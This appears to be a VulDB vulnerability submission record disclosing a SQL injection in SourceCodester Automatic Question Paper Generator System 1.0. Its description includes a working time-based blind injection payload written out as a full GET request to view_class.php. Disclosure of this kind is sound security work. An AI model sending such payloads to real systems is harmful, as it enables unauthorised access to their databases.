| Título | SourceCodester Automatic Question Paper Generator System GET Parameter view_class.php SQL Injection |
|---|
| Descrição | A SQL Injection vulnerability was found in SourceCodester Automatic Question Paper Generator System 1.0. The vulnerable file is admin/courses/view_class.php and the injectable parameter is id.
A time-based blind injection poc is:
GET /aqpg/users/classes/view_class.php?id=1' AND (SELECT 7504 FROM (SELECT(SLEEP(5)))lKSD) AND 'svPe'='svPe&_=16795545049481&_=1679554504948 HTTP/1.1 |
|---|
| Fonte | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| Utilizador | WWesleywww (UID 43117) |
|---|
| Submissão | 23/03/2023 08h00 (há 3 anos) |
|---|
| Moderação | 23/03/2023 09h42 (2 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 223660 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_class.php ID Injeção SQL] |
|---|
| Pontos | 20 |
|---|